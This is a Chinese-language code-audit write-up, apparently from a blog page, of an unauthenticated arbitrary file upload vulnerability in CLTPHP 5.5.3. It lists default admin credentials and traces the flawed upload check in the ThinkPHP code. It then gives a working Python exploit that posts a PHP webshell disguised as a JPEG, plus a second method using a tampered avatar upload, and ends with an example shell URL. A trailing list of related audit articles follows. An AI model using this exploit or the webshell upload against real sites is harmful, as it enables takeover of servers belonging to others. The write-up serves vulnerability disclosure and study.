默认后台地址: http://127.0.0.1/admin/login/index.html

默认账号密码: 后台登录名:admin 密码:admin123

代码分析

1、漏洞文件位置:/app/user/controller/UpFiles.php 第5-25行:

在这段函数中,未经用户权限验证,获取表单内容,存在越权绕过上传的情况。我们继续跟进move函数:

2、文件位置:/think/library/think/File.php 第329-377行:

在这段函数中,经过一系列检测后上传文件,我们重点来看一下check验证上传函数。

3、文件位置:/think/library/think/File.php 第218-245行:

在check函数中检查文件大小、Mime类型、文件后缀等,主要是从数组中获取,函数未带入参数rule,故采用默认值,我们看一下rule的值

在同文件中$rule默认值为date,调用ThinkPHP的上传函数,但配置不当导致过滤函数chenk无效,导致程序在实现存在任意文件上传漏洞,攻击者无需任何权限,可直接上传恶意脚本,控制网站服务器权限。

漏洞利用

利用方式一:

1、 通过编写Python脚本,模拟Ajax 异步请求, Python’脚本如下:

#!/usr/bin/python #-*- coding: UTF-8 -*- import requests header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' , 'X-Requested-With': 'XMLHttpRequest',} url = "http://127.0.0.1/user/upFiles/upload" files ={'file':('1.php',open('1.php','rb'),'image/jpeg')} res = requests.post(url, files=files,headers=header) print res.text

2、在同一目录下放置脚本和1.php文件名的小马,运行Python脚本,成功上传木马并返回路径。

访问url,成功getshell

利用方式二:

1、在前台注册一个用户test,登录会员中心

2、在会员中心—设置—上传图片马(包含一句话)—抓包改包为php后缀名

3、访问shell地址,成功获取网站权限

http://127.0.0.1/public/uploads/20180309/64a211154e71c05795a9f901860b62b9.php

php getshell,CLTPHP_v5.5.3 前台Getshelll漏洞相关推荐

  1. 任意文件上传mysql_[代码审计]XiaoCms(后台任意文件上传至getshell,任意目录删除,会话固定漏洞)...

    0x00 前言 这段时间就一直在搞代码审计了.针对自己的审计方法做一下总结,记录一下步骤. 审计没他,基础要牢,思路要清晰,姿势要多且正. 下面是自己审计的步骤,正在逐步调整,寻求效率最高. 0x01 ...

  2. 帝国CMS(EmpireCMS) v7.5 前台XSS漏洞分析

    帝国CMS(EmpireCMS) v7.5 前台XSS漏洞分析 一.漏洞描述 该漏洞是由于javascript获取url的参数,没有经过任何过滤,直接当作a标签和img标签的href属性和src属性输 ...

  3. 【代码审计】CLTPHP_v5.5.3 前台任意文件上传漏洞分析

      0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chich ...

  4. 【代码审计】CLTPHP_v5.5.3 前台任意文件上传漏洞

    0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chichu/ ...

  5. 【代码审计】CLTPHP_v5.5.3前台XML外部实体注入漏洞分析

    0x01 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chichu/ ...

  6. (帝国CMS)EmpireCMS v7.5前台XSS 漏洞复现

    漏洞范围 EmpireCMS 全版本 <7.5 漏洞POC http://*******/e/ViewImg/index.html?url=javascript:alert(/xss/) 漏洞复 ...

  7. opensns v6.2.0前台RCE漏洞分析

    最近准备进一步学习下代码审计,因此打算找些历史漏洞分析学习下.(啥时候我也能挖出前台rce呢 本次漏洞的入口点在于 Application/Weibo/Controller/ShareControll ...

  8. 某cms前台逻辑漏洞学习

    介绍 初学者,都是看了网上的方法自己试着分析的,感觉大部分还是解释得比较清楚,请大家多多指教.仅供参考哦!!!!!! 正题 0x00 安装feifeicms4.0.18(建议直接安装在WWW目录下), ...

  9. 帝国CMS(EmpireCMS) v7.5 前台XSS漏洞复现

    一. 漏洞描述 该漏洞是由于JavaScript获取url的参数,没有经过任何过滤直接当作a标签和img标签的href属性和src属性输出 二. 漏洞复现 需要开启会员空间功能,登录后台开启会员空间功 ...

最新文章

  1. Dubbo 同步、异步调用的几种方式
  2. Java读写二进制数据
  3. 白话设计模式——Builder
  4. 【终极办法】org.springframework.beans.factory.BeanCreationException: Error creating bean with name ‘helloC
  5. Weblogic 错误 BEA-000403 BEA-000438解决办法
  6. oracle存储过程+游标处理select数据
  7. 帝人製机--适合的机遇--遇到恰到好处的产品--工业机器人减速机造就一个百年企业
  8. 简单3步成功给Mac安装指定Python版本和指定库版本并且随意切换版本,非常简单,不行拿砖砸我
  9. Redmi 10X Pro样张首曝:搭载流光相机技术 一键成创意大片
  10. 概率论笔记:随机数、概率分布(正态分布)、中心极限定理(大数定理)
  11. hibernate中session 与JDBC中 connection分析
  12. unity Console窗口的输出
  13. python数据分析课程网盘-数据分析技能 全套 百度网盘 下载
  14. ListView刷新时让Item不可点击
  15. 信息隐藏基础算法——LSB算法(python实现)
  16. 【Linux】bash: /home/stefan/jdk1.7.0_55/bin/java: /lib/ld-linux.so.2: bad ELF interpreter
  17. 实现内网穿透,个人电脑秒变服务器
  18. GStreamer学习笔记
  19. 我的世界服务器领地系统,[综合|安全|经济|传送]Residence —— 领地保护(圈地)[1.4.7-1.8.8]...
  20. el-input/input取消浏览器记住密码问题

热门文章

  1. 前端项目代码加密教程
  2. 一次xbuild编译失败的排查
  3. python前期学什么过度_python机器学习中过度拟合现象是什么 怎么解决
  4. mysql服务启动报错1607
  5. 串口协议调试利器-虚拟串口工具
  6. mysql 远程超级用户_Mysql添加远程超级用户
  7. [转]恢复分区无法删除怎么解决?
  8. mysql查询数据库存储引擎_MySQL数据库存储引擎
  9. 前端 Bootstrap
  10. Java 双亲委派模型